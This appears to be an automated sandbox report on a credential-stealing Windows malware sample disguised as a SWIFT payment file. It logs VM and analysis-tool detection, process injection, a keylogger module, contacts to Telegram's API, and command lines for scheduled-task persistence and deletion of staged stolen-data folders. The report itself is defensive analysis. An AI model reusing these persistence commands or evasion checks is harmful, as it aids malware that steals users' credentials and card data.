                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HOOKEXPLORER.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AUTORUNSC.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: REGMON.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IDAQ.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4048Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 7056Thread sleep time: -1800000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4508Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4508Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4508Thread sleep time: -99641s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 1792Thread sleep count: 1592 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4508Thread sleep time: -99515s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4508Thread sleep time: -99405s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4508Thread sleep time: -99285s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4508Thread sleep time: -99170s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe TID: 4508Thread sleep time: -99058s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe TID: 7096Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe TID: 6992Thread sleep count: 38 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe TID: 6992Thread sleep time: -2280000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe TID: 7004Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe TID: 7004Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe TID: 7000Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe TID: 6960Thread sleep time: -780000s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeWindow / User API: threadDelayed 1592Jump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeThread delayed: delay time: 60000Jump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeThread delayed: delay time: 99641Jump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeThread delayed: delay time: 99515Jump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeThread delayed: delay time: 99405Jump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeThread delayed: delay time: 99285Jump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeThread delayed: delay time: 99170Jump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeThread delayed: delay time: 99058Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeThread delayed: delay time: 60000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeThread delayed: delay time: 60000
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: Amcache.hve.37.drBinary or memory string: VMware
                    Source: Amcache.hve.37.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware svga
                    Source: Amcache.hve.37.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.37.drBinary or memory string: VMware, Inc.
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hyper-v
                    Source: Amcache.hve.37.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                    Source: svchost.exe, 0000000E.00000002.650106846.0000000000ECB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\t Certificate Authorit
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.480236293.0000000000B10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareYF66TM4VWin32_VideoController8M1TH8OBVideoController120060621000000.000000-000340.6003display.infMSBDA49_9YZLWPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsY48G5CES
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qemup
                    Source: Amcache.hve.37.drBinary or memory string: VMware, Inc.me
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.649408260.0000000000E85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: Amcache.hve.37.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                    Source: Amcache.hve.37.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1g
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware(@
                    Source: Amcache.hve.37.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                    Source: svchost.exe, 00000028.00000002.650586670.000000000329E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: Amcache.hve.37.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.37.drBinary or memory string: VMware7,1
                    Source: Amcache.hve.37.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.37.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.37.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.37.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.37.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                    Source: Amcache.hve.37.drBinary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
                    Source: svchost.exe, 00000028.00000002.648938899.000000000104F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareYF66TM4VWin32_VideoController8M1TH8OBVideoController120060621000000.000000-000340.6003display.infMSBDA49_9YZLWPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsY48G5CESp
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeDomain query: 245.246.1.0.in-addr.arpa
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeDomain query: ipapi.co
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeDomain query: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeDomain query: api.telegram.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeNetwork Connect: 173.231.16.76 80Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeNetwork Connect: 172.67.69.226 443Jump to behavior
                    .NET source code references suspicious native API functions
                    Source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, Log/Modules/Keylogger/MainModule.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
                    Source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, Log/Miscellaneous/WinApi.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeMemory written: C:\Users\user\Desktop\SWIFT_USD_165092.exe base: 720000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeMemory written: C:\Users\user\AppData\Roaming\svchost\svchost.exe base: 920000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exeMemory written: C:\Users\user\AppData\Roaming\svchost\svchost.exe base: B90000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Users\user\Desktop\SWIFT_USD_165092.exe C:\Users\user\Desktop\SWIFT_USD_165092.exeJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C mkdir "C:\Users\user\AppData\Roaming\svchostJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /fJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\Desktop\SWIFT_USD_165092.exe" "C:\Users\user\AppData\Roaming\svchost\svchost.exeJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\Credit CardsJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023\AutofillsJump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\404d522a-62f5-4eb2-91f4-202649d15261Jump to behavior
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\svchost\svchost.exe'" /fJump to behavior
